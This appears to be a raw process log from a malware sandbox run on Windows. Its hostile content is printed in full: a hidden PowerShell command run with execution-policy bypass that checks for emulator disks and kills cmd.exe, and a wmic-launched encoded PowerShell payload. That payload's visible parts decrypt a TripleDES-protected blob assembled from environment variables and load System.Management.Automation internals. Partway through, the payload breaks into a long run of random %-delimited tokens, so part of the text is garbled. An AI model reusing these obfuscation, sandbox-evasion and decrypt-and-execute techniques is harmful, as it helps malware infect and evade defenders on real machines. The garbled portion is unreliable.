User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4332 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4364 | "C:\WINDOWS\system32\UCPDMgr.exe" | C:\Windows\System32\UCPDMgr.exe | — | svchost.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: User Choice Protection Manager Exit code: 0 Version: 1.0.0.414301 Modules
| |||||||||||||||
| 5764 | powershell.exe -ep bypass -w hidden -command \$lnYpHvUKOmjPeoBRE=(Get-Disk).FriendlyName;if (\$lnYpHvUKOmjPeoBRE -like ([char]0x2a+[char]68+[char]0x41+(f{} 'D' -f '')[4]+[char]0x59+(f{} ' ' -f '')[3]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SA==')))[0]+[char]0x41+[char]0x52+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RA==')))[0]+[char]0x44+(f{} 'I' -f '')[2]+(f{} 'S' -f '')[3]+[char]75+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Kg==')))[0] -join '') -or \$lnYpHvUKOmjPeoBRE -like ((f{} '*' -f '')[4]+(f{} 'Q' -f '')[2]+[char]0x45+(f{} 'M' -f '')[3]+(f{} 'U' -f '')[2]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IA==')))[0]+(f{} 'H' -f '')[2]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QQ==')))[0]+[char]0x52+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RA==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RA==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SQ==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Uw==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Sw==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Kg==')))[0] -join '')) {taskkill /f /im cmd.exe} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8048 | wmic process call create "cmd.exe /c ([char]112+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))[0]+[char]0x77+[char]101+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cg==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cw==')))[0]+(f{} 'h' -f '')[2]+[char]0x65+[char]108+(f{} 'l' -f '')[1]+[char]0x2e+(f{} 'e' -f '')[1]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('eA==')))[0]+[char]101 -join '') -enc JDBWID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZW52OkJpdzJkQUphdU4zc25QWCArICRlbnY6M0REb1FFSml3cDlJciArICRlbnY6SHA1b0paUmVxQ2VtRVMgKyAkZW52OlRlM24zVmF6S2NEICsgJGVudjpISkk5OGU1dGxvRzJBVHlTayArICRlbnY6YlRkeFF4R3hPUXRJICsgJGVudjpGbVJmQU10SlllT1NnYUF6ICsgJGVudjo4UVlFTDVHa2hMSmYgKyAkZW52OkpvbkoxQTlUT2cgKyAkZW52OmdqcFd4TVIzUUdyNXRKICsgJGVudjo0RllNV2IzdkduaSArICRlbnY6cVVCeWtBSGFmdlN2ICsgJGVudjpGVzk4dVpGU0V5ZHV2ZEQxbSArICRlbnY6M0FtTVM2RmhpNDE4ICsgJGVudjpMekJNbUVpYmlnN0lzUndRICsgJGVudjpqREE2Z09BNGtKICsgJGVudjpZbUxFeFQ0Z2R2TVUyR3ZjICsgJGVudjo5aDR4VGxkSDg1UE52WXEgKyAkZW52Okl2MlF6Z2tpc1RmMyArICRlbnY6ZkFFR2JtYWNwQkZRZUtpMSArICRlbnY6Z0p4QzBubXByR2syaXlyICsgJGVudjp1VTdNSzdNd0p3MndUM1RYICsgJGVudjpJSVBmdTFrRGN5YkVBS2MgKyAkZW52OkhnNTFwSmZEMDA2UUR4WFhjICsgJGVudjo3MUFIRkM3WUpkNGk1cDA2byArICRlbnY6OUFod0FxcTBSeCArICRlbnY6QnlkczVDbVhQYnRjUiArICRlbnY6VWdWU3huWENvUGh6cE5nMnphUiArICRlbnY6N1N1NWVDTldnYThabE1HMTMgKyAkZW52OnFUcnBzUWdQZXhhICsgJGVudjo4SWg2RUo0WUFWWGdpVXggKyAkZW52OmVHVGxzajBDQWhUICsgJGVudjoxVXdKUmJHTUZQMyArICRlbnY6Q1FTYU1NTG11MTZTUG5VSyArICRlbnY6bVRZME8ySmRoSG0gKyAkZW52Om8xV00yZDN3ck5BaCArICRlbnY6blZmRlNJOGRpRnhNdGwyQVggKyAkZW52OlFhMkJyYWRCSENaZ1VnU3QgKyAkZW52OjNvemI5TUhoZUQ0OEswYjIxMiArICRlbnY6OVBOWTNZUkk4dE84ODl1ICsgJGVudjp6RFdJN2o3Q0docGVHICsgJGVudjpXNFJHbGc0UUY1WiArICRlbnY6NVN4bHBEUUtaQjRIeU00ICsgJGVudjp5NmdsYW5DZVhmICsgJGVudjp6ME53VHpHVHRsdjR2cSArICRlbnY6U0VvT1ZFTW9oMTYyWkYgKyAkZW52Okl0RWtPazh3d0d4TGp1U0tVUVAgKyAkZW52OnRkMnZtVmZBWThNTUdmICsgJGVudjp5eUcza1VRV3hnbkkxUm5MQSArICRlbnY6TWh5amU3eW9VanE1bFZWQ1NuICsgJGVudjpsb2prMkY3OVI3WWFwICsgJGVudjpncERlZWNlbldheXQgKyAkZW52OmtFMk15cjJyRGtiICsgJGVudjo2dUJWTEtPZnBJQTdCICsgJGVudjpiOWFkazZmcGxONzFFVUsgKyAkZW52Om5xcjQwVXBEMFYxb2YyUUggKyAkZW52OlU4QkRabFdiajFsRSArICRlbnY6T25VdmJmMEJTdEh5YWYgKyAkZW52OnNXWDlIckpxaWJSVHVsSTFRdzMgKyAkZW52OlpEeDZlNlZtSVExVUpZVU8gKyAkZW52OjJrYTJ4Q0xsM2tCZlQyZyArICRlbnY6Y1F0UzQxT2ZBUzNWICsgJGVudjpMOG9iNEN4TU1YMjlhRDEgKyAkZW52Oldsb004dUZxcGFoRmogKyAkZW52OllxM2NSMGtKMTdGOSArICRlbnY6dGszNDEwbFY0aHFINyArICRlbnY6WVk3aUtxenc4cCArICRlbnY6WVQ5b002OTYyNEZsSU90WiArICRlbnY6QmM3NmptR2RoaWsyQyArICRlbnY6eE5qMTVtbG1uWHh2SmJKdkNiICsgJGVudjpQMnc5bTVMdE1yZTRnbDZUbyArICRlbnY6QjA3VW8wSHhhbUQgKyAkZW52OmlRa3d3c2lxbEI2dEtkdHdKICsgJGVudjpOZmF1dTNQdVljM1RNICsgJGVudjp2S1huQjFHcG4wM1c1MGpCKTsNCiQxViA9IFtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlRyaXBsZURFU0NyeXB0b1NlcnZpY2VQcm92aWRlcl06Om5ldygpOw0KJDFWLktleSA9IFtieXRlW11dQCgyNiwyNywxMTAsMTg4LDgwLDI1MSwyMjAsMjQ3LDg3LDEzNSwyMjQsNDEsNTEsMTYzLDIwMSwxMDEpOw0KJDFWLk1vZGUgPSAoKGZ7fSAnRScgLWYgJycpWzRdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdRdz09JykpKVswXStbY2hhcl02NiAtam9pbiAnJyk7DQokMVYuUGFkZGluZyA9ICgoZnt9ICdQJyAtZiAnJylbNF0rW2NoYXJdMHg0YitbY2hhcl02NytbY2hhcl0weDUzKyhme30gJzcnIC1mICcnKVsyXSAtam9pbiAnJyk7DQokMlYgPSAkMVYuQ3JlYXRlRGVjcnlwdG9yKCkuVHJhbnNmb3JtRmluYWxCbG9jaygkMFYsIDAsICQwVi5MZW5ndGgpOw0KJDNWID0gTmV3LU9iamVjdCAoKChbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdVdz09JykpKVswXStbY2hhcl0weDc5Kyhme30gJ3MnIC1mICcnKVsxXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZEE9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdK1tjaGFyXTB4NmQrKGZ7fSAnLicgLWYgJycpWzNdKyhme30gJ0knIC1mICcnKVsyXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVHc9PScpKSlbMF0rKGZ7fSAnLicgLWYgJycpWzFdK1tjaGFyXTc3K1tjaGFyXTB4NjUrKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2JRPT0nKSkpWzBdKyhme30gJ28nIC1mICcnKVszXSsoZnt9ICdyJyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2VRPT0nKSkpWzBdKyhme30gJ1MnIC1mICcnKVs0XStbY2hhcl0weDc0Kyhme30gJ3InIC1mICcnKVszXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnWlE9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1lRPT0nKSkpWzBdKyhme30gJ20nIC1mICcnKVszXSAtam9pbiAnJykpIC1Bcmd1bWVudExpc3QgKCwkMlYpOw0KJDRWID0gTmV3LU9iamVjdCAoKChme30gJ1MnIC1mICcnKVs0XStbY2hhcl0xMjErW2NoYXJdMHg3MysoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZEE9PScpKSlbMF0rW2NoYXJdMHg2NStbY2hhcl0xMDkrKGZ7fSAnLicgLWYgJycpWzNdK1tjaGFyXTB4NDkrW2NoYXJdMHg0ZisoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluhdiUcD9N%VqBY4q6e%oMdIOMp%Unov2EA%IlXobUZO%sOBL07%PvuhKjtO%jlC54%RK5HpT%BEO538jZ%WprsLxj%I6SlH%pslAm9sG%BgTA%qf1JmM%wIxlcB%DnKsejA%uu93W%TFENz7y%sLVFPnj0%lUmO3b%rOvIM%fQ4zz%Yw9Lx%yIsmqlMM%OzXr%mIax%UTiBfP%NkoS%MhVe%sOC7Yyqr%EEX2aVO9%hL04%tlFu%XeUM%j7SM%yFWjO1t%hvddgu%Ej9LM%Eqls8qZ%Qvi5R6GO%a5raArsY%pIrAgC%IJRqr%eFwE%hS52nR%C6FJy0oY%T9W8yd%Rd68j%naMEzA1v%qroSHD%Es9Dw%bFoYpT3%iiE9oh%Cmfj8%jPr7%ldpPK%lIPHpQ3e%QGo9%PoyC%l3FPFB%WQyAfi2%mIpwp7w8%VoE9J%GUXIUQ%krMzzl%n25wMQ2%dQjCF%HduhjZd%NDZX%UGAIw%VZq9PZ%GnBGC1%oVDlb%FT52NV%LkwKoL%WxVfUW3%E7pe%fo2oW%LIL3qDld%B1nh%Ss4fm%wBvKx%Zy89D%DaOU%gL31b7%ZQTeO%LBQ5%ImCD93Z%p5Rhe%kVSDi%Nzs80Uq%s325N%EKju1il%SeUVm%UxUi4O%kX9MOf7b%Q2pjk%o3igelb%Ldcfwm%gbtT%qv7djeX%BZlyB7%eHC491rD%YK8fP1B%aNWm7W%GGRljJ%OOIiwCZ%RpXW8%USr7HCO7%fxpqjpo%GdGL6%nMSHrRy%ypyFqt5%RwTRH%Uha0z9%tHh4yF%xZGeR%O5nhIbGD%jA2MUPa%Q623MlFw%CnxoVm%c0BVYT9I%DNWJjt%eHLdcT%l0L6SCIx%HQCc7NGV%vwOmsLu%VZd6q%pPxAGQ%HiXMztH%LDZ4%I2ms%oyPWM%o24IHsqd%SBclsd%Gwdu0b1%I22F%Hc8qJg%X0F5%obBm%oVRoB%stzu4Lhe%Fr1VpFrx%SnwLHg%KhFvqr%XLVRD%CGKWU%ftsul%spePSxzB%GtBls7%p64Uk%nvkOy2t%NhKfMhB%W2qhJv4H%lPFAIL%lSonIEo%dijFe%bhzB%OMfQa0Mi%UNFbpN%cHLJaONt%KOa4cg3k%p5j3W%MSrurw%tv6N%Hm1GesWG%MPPWfoK%RF2IBTz%vXfv%U3K00C%ooeibqLo%VIWZSp%edfK0q2%DiJ3r%TbmHb%dbvZJ%VAm5%jYyh0%AuK2vjn%nE1W0k%U6s5BQ%mnpmch%AxMq%IWOpx%aDQkH%QrCWHiv%CNieB%Odi49z%cvpGj%mLayGkp%aSMuST8%T8y3%OJOvJzqP%O8oM%auhIQn%rnT8%oQ32h7R2%TGCtc6b%wtv4lG%u6ir%iIjtk%f5hB%JcH2r%aTWqrA9%ACb6z%Byxa%DeS90%E9jQN5%gb4Gz%BfaztP%iPokL%TqBoz3S9%HGAsi%XYO9mkg2%hm13dG1%N0awsv%zASG39d8%UgoQ%sVmiRzyn%pIILq%DAP9Vq%RpD4j3%XGwaOoY%roHfa%HSHR%radD5%qg6G4U%vcgU7%duw7Mb%mabb%Sdmx%B5WoTXDe%jCZL%ChTmr%Ocguy%TLAph4Z%MZgUPvM%D9bfFc%DQfb%RrXV%d2zEg2%OHAVJ%ryzdc6%SaYup%FnQS%Cz32UcZ%yS2XQSj%c6D2KA%MmDF1m7%nVsp%HMmJXy%Nucv7J%g4SpyXt%bG3K%R4iW2M%QyNuJp5%TRuNP%wWEQ%NcCgT%Q1XMLgj%eNFYU%vKzBll%dwUc1%V5HB%vArT%Bu0lu7f%Rr9W%v0BUL9KY%qhMZnT9h%aOzRYqQr%bItgWL%GmDll%lAbH%d7yNQ%PW7H%dvAr4l%ILA5%uO0w%i2Jw2EF%LCiwgN%vFuNPDF9%W3uY2vX%DvqkXMy%SYeqiP%ESqDGI%LVsLUx%CVcT39%cqEYb%roV5X%a2y6AAzu%dWX6dR83%caXv%JXHK3Ap%MKqp5MB%OVcj%GIFaPu9%cFKIxF%oKQk%OVhQ%vWl5E0H%MrcNnk%XTnjvDtI%UeHwN%Db9pAqvg%OwgHlyE%aRJiWV%V9j5fyT%mdrznd%dhnf4L%A104%fQvk%SRY2%V5bxP7b%aGfetaF%VJNxum93%kdTR2%Vt8QZCK%OXgvfq%jrBGu%BiM6%jlMWYr6%ATed2F%KXMwtw%BPLz%VByKE0c%fIHAes%l2FN%KAr7w0N%Xq7Po%Iyhio6rZ%xcnoKq%MwZVnjT%bVqlY%RBiQH1%IoQB%AgUqTx%pHYjvfFT%zrqLHX%op9jKSk5%UYjDoZY7%TD9Ast3%afU9MA%fT1Dpva%A3jYkE2e%VRz5zY%mz63fl%AkTdD3%xvWlNYPb%Ci0vcd%Rwcj%RSfC%pSNJYC2l%GAKDR%sbgH%YnEI%a9jl72%Hbkc%E8WStqgx%Q6UOXZ%HELqDKY%E1M6j59%NgdxzHST%Cb4p%KKsa%k5v4BQ%qi1vFk%Y3JmMF2%Uxdj65%t5ESSt7k%iu0LAY%MoshH%Fk9rr5%M8MKKbmg%D29A%Erde%OKyr%DaCsL%dAQrv%s8jZX9Bh%pIY7G%Qc2i3DU%Cp7XJY45%Z6aYeue%kdPmy%u67Wz%Whk2Xd%koytAG2%PuthPt%uS0B%qOR0AaM%zBI63%YZRBT19%p5WLzxL%Nue5f1%Tg4RX%IBzf%R90uzTF%DSGBWdK%mI11j%qff5GaV9%woQzH3%ISuC%MLINwju%yroU0Zpe%nvIBFLr%evvjNfl7%SZq2SA5%vwz9nvz%SMTedgd%VgMhG%lcNxc3%a9211%qDUU9P%NixjM%Ct3m2K%nEBv%M9HK0DE%tmPBH%r35d3Xz%R4Zpqu%kLF4q%jqIeMN%qFylUvgf%Ul52PJeB%cHrfJW%xJyOLd%ZZuiQzHM%hwsfn%QzGB5H%v4g6Y%UgDSg%qW4H%Mg0VJu%SHsue%KHfg9Hn3%uBZGrQx%CM1Wc7k%oHrk%reqoTy%oGvl%jiSbwxN%xxBY6%vpVhn%KPgFhc5d%wC2gX8%cg0Cow%urluiiaW%pdfc%yh2c%BExAiRk2%ztJhd%Zio4BNLB%n07ebc%bbd5%GlVt%fwl3%N1eOPup%QPhh9%kcZSpL%D5lr%PwSSxWg%vqAiO%HpmB%stnHlTx%hakzP%S1lMz%MPpa7N%s0p8%da8H%WzUn2Qqx%yVnBbOy8%oQf5%WZ8DKw%GGZjh%IMqk93%oSZFnC%JmQ6p%oAfn%qIovk6n%k4k9L%pfEtqR%K5SsXJZ%CFNYqydS%jc24p%yxxiK%M7NUUBZp%cmq5XDxL%wtdtQBpF%urdXj%Ixc3GS%HOQfhsMj%Y1n1%RXSmU%pDsdpf%hzl7Q%o98RxzY%DHrLTM%B04u%OCeHxzTv%ShqBl%sn311pe%d2Ct%LCWi%VR79voq%A2sF%MReQhdN%eTil%MYd32g%Uq0tMN%UkEA9QH%sHYu78n%psW1c1c%NgzqlSN%HS4E%pjGL%elwlZjRx%TsbUh2MU%TC32aNV8%dzpyp5l0%tIXgF%Twvv%i9XPSoZ%hT9IA%cY3J4aMo%liAW979W%z72LoX%Mek1RQ5%VUPD%CBXR0k%Qpurrd%dvsX89xo%s8FD%aiHp5%rQxA%Ll8Fho4%AYRaOYJ1%L1bGTKdR%Tlkm%nJj2G%tG1eA%lr9WGg%EEQm6s%diBJd4u%AKYqBMIM%rtwl4%KEe5B2%Vjj3Cc99%QhLX3lvH%P5Fz6%FPriJz%vXhf%ChTsMEY%uwj4%IqH4f6X3%mNMk%wvm7lx%mdFQcwK%hnhH4lI%wZHLHbNA%dHTCM13%jluzE04%DqAQmu%d9e21NF%xHfYVu%nDCw%OlGsCb%fFCI%axAY8U7Z%a1WU%X8OPP%r8RHKG%LzMG%jy7k%QTPJHXU%Ho9Ohyd%lhhbhA6F%ZHIOVbNG%HzsyJl6w%ginF5%VoKl4U1%aHCG2LL%rYdt58%wuvsnv%bny1t%f70Ys%Re111n%IIgVvSn%AFIEvypU%TcUB%zWQysi0%oEiup%BGmI9Ss3%cHvqn44%Axo7%mvQhPPyb%gzL2tH%z6aHjWj%P2hlS%UyTalwf%WiVz%hYO8%SUh7qZJw%A9wBOM8%CYJUH%qX63r%iB6zdTlB%etsauLQV%hSvje7%wzfNYRf7%ssl13Lmw%seDt%hw9Ix4Cz%rJplPyXf%zgETQo%g99hpZQ%FdUU3Y%nLdb%NG8CPc9%JjMpiO%ZdSCTV7y%WDgTv8z%EcVZLX%WCUW3Q%V3zd7vHz%mH7HdL%g2ja%TBT1e%WVWX%bUYj%gYfcea%wU4ETq%hzTi%bywB4%KUNq%klRuBls%tIhEnuI%Wh4s7F%RzNmDHG6%gL0q%HvA1huGK%kBFu%dO9v8px%UfJzU%kZYXrw14%tmJTl6S%kpQu%E5XDRE%EeRlGO5t%sqPWR%khMUhC%MtceKc%Ec5j5Is%iwkKQ%cmUI%mR8KbYg%u1oEf%hXqGcb%dvaAT%n7t2VhZ9%oUFl2%Y6O6H%NyWD%UY6HwvNe%tzSG%bVw6hD%emLnAkf%lIf0%uRJHe5%hFxz4%QTApB%tSiZVB%AFcwg4T%KFsRt%LRaWr%zspYr%sm5E%JTIV%H8xT%rojPB%a9qm8MVp%bU2b6Z0%RSmfJIi%tg98%XcKw%NG2c%tRqE3%Zgj8GwrX%BiEnobO%QFncuI3H%lMWHi%T6GJ0zKC%hkTgzj%nb87L%h8atur%HP8qeuO%zOPpjj%uFO0%wEBVD%g7oDD3N%x0AN%h653X%hrPqSXU%ROqF%pR3u4G2%E0jkzd%Dhob9bcJ%XYqwN%tC0wU4%dV8I%vcjis6%NKGDwm9c%VzsS%hvTAA%WiYOdS2%crrJcI%OKzQtD%aDvLxJ%ivEFDl%kKYsS%aVgR%xTJ6%AH9c%VZOpIGrz%XIGnB7M%LFCA9JfO%omLdy4mg%o4ss%cpoga%wvgO1G%IJGOAKWD%b035jo%dVof8C2%RtOZV0Hx%ejx5K4On%gpV5T%p8W5oG9p%DrR4%ckbBWUMr%WbP03%JWccZh%VqLoLQVA%EjlpA%swAt9U%IPnv1FvY%qVmc%Je2QaGc0%LnTAT%KJULMdRc%sFBCs%qMkh%b8wO%wd8CmQ%N6Cg1ZO%xCINkES%ssCm%Ff8xS%mojCg%idDFxLp2%Z57zwKGJ%KJFhu%a8zsv%RhjR%l19qxYSb%FZXkyutH%RURj1T4%tmO4%dEEC%ZV12%Jnu3H3%Hw4gMA%rDvnUTtl%xkwj%sQSJqqID%a0DTx%YcxCfp%SkyA%QBwA2Z%S16Mb%DZ5tE%tGWgP4%aIQeT1%JiCLf%jTya5e%bCl8%qovXfQ%evqVEuPQ%KCNQBU%LBgC%Fgc2U%eHW3NPpC%T2vqtp%IY7dVlC%DpzHG9RE%iw5gbC%rdzlSNn%LGjllo%MoIpQ44%LoY0%cYgm8%qKC6ezPe%DOoJO9gl%YZHB1a2N%zg0m%jjss5%i9412o%rBOKgazJ%inU3%toQaPaQo%vgtk%F7KBt%sh5Y%KYxMx%mhch%jTtZA%nCkCm1A%PaxRb%gwB3mH%CYnfBA%lQ2ipP%Xk3Xtmgg%y4O9sze%gxMpefTm%hOw7z6O%D9YhI%EzLzIj%N2efz6%YcnEr%uJ0zkM%UFJBf%jtGeN04U%hYN3%p2KZ%fa16M4li%weBMdFJN%JJuULK%cYhl%nO8AOW%Nw5UH%RHGlp%I7worAye%C6d8q%Rqg0s%bpho%IOwC%EOsUJ%rT1dH%MhND%eQtvvk%T7EKxFg%sW5UMQxA%dx6scX%UaX92t4%OrhfF%rs2zTLkU%jMoNgvs%DhRc%hQBd%IoNVze%skYNj%cJIveq%rCU5%rEzs2Fm%p7a72dQ%UarWg%cXWZ%xzA6QYxD%P9XzyMkB%k2YU%g1pwv5%m2f744X%Pove%CZc91Lr%oIGdXy%UcZq9%kFWH%Zwu1WiaH%kMxN%pd5z%twsnFT9l%BAP24%hfQ7bf%j64BeI%SYjE%dhw0%W2hkd%Tusz9tT4%sDht%G3MY7c8%nyvtK%OItnc%fBOwyQK%Cvne%Untu%c8ra%KhyiWVpV%kg75%gqr4%XlVqUz%Y6M6BjC%poxkR0t%QRPjWrUe%OEug6%WhyZa6Ef%sQ4X25%OdPSC5b%rYs5%soo7D%fAYxW%PIR2cS%kh7iBDCU%q42iO%xgrFn9GQ%VgO6%oIAt3aE%c3iMjv%tESC7%NP2Bu%EgnYrWAb%rFng11E%jhIwZ%cKGA4%Te8G14c%MUHr%q0nA8Gl%ISB39vEe%vvTJ%BKbaSU%YLkSfNB%gO3aqe%xS8ly%u8ax0%PzHWfpB2%MPoHH%mZBa7q%YRnYXXx%QLQh4a%mJGFE%BXAE0hN%e0cxcUYd%j6WG4%UIXjwUdr%l2JEZ1jK%wqAneE%hWxwuTz%mLhPOT%ogHKJc%aLPhk%zuPxUTD0%TBpI%Purb%Ao9LM%ygubULy%II8p0Fjw%Y43w%PBcHxbW%CGi8%OYKlar%zvVv8%dACAi%SIIwjlA%DN5z2pF%ExcWCkD%tCm5s%S5ww%xP2aR%A3eLE07%z5hWf%di7Jp%kztJAukP%cXi0%oAKjJayS%JKNDYW%J9mdAD%UJIN3E%mIHHOvsL%HqghCA2%BJKW0fuy%ZV3OK%NWfW0y%o9vP7Y5%OEyd0%jrzL3Z%huW4bgI%B1yI%BncEpXU%CDxubjGO%GqxaM%M9zQ7DNz%BX6qs%a8x02nq%ooE4ns%oeXB%l1uN%h8o9elr%vsavj%puw9hMA%uTW45N%WzbQ%GGpKhSOx%AywUwcQ%U0b7xU%Tt13Qes7%R3o7jx%gfSSU%j5HOahs%Yi4ki%hbdECh2Q%x9Ji1F%wXAVfdEM%X3slT%iVKxuC1%CqGya%XGW9Um%zXzbgI%eO5TKx%judL%KBmT3YZm%J0PL%LOg8l%lRZSsJ8m%csjo1%V6Yh%MV10HC%AxlE1%NdOdZ%RlS2%WVTT%xffurp%s0AR%KIAxuUq%Pv2j%OEEUjbGlhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdidz09JykpKVswXSsoZnt9ICdjJyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdKyhme30gJ3MnIC1mICcnKVsxXStbY2hhcl0weDczIC1qb2luICcnKSkgLUZpbHRlciBQcm9jZXNzSWQ9JHBpZCkuQ29tbWFuZExpbmU7DQpmb3JlYWNoICgkMTFWIGluIFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSkgew0KaWYgKCQxMVYuR2xvYmFsQXNzZW1ibHlDYWNoZSAtQW5kICQxMVYuTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygoW2NoYXJdMHg2ZCsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY3c9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1l3PT0nKSkpWzBdK1tjaGFyXTExMStbY2hhcl0weDcyK1tjaGFyXTB4NmMrW2NoYXJdMHg2OSsoZnt9ICdiJyAtZiAnJylbMl0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0xnPT0nKSkpWzBdKyhme30gJ2QnIC1mICcnKVsyXStbY2hhcl0xMDgrW2NoYXJdMHg2YyAtam9pbiAnJykpKSB7DQokMTJWID0gJDExVi5HZXRUeXBlKCgoZnt9ICdTJyAtZiAnJylbMl0rKGZ7fSAneScgLWYgJycpWzRdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdjdz09JykpKVswXSsoZnt9ICd0JyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdK1tjaGFyXTEwOStbY2hhcl0weDJlKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdVZz09JykpKVswXStbY2hhcl0xMDErKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pnPT0nKSkpWzBdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdiQT09JykpKVswXStbY2hhcl0weDY1K1tjaGFyXTk5Kyhme30gJ3QnIC1mICcnKVsyXSsoZnt9ICdpJyAtZiAnJylbNF0rW2NoYXJdMTExKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdiZz09JykpKVswXSsoZnt9ICcuJyAtZiAnJylbM10rW2NoYXJdNjUrKGZ7fSAncycgLWYgJycpWzNdK1tjaGFyXTExNSsoZnt9ICdlJyAtZiAnJylbMV0rW2NoYXJdMHg2ZCtbY2hhcl0weDYyK1tjaGFyXTEwOCsoZnt9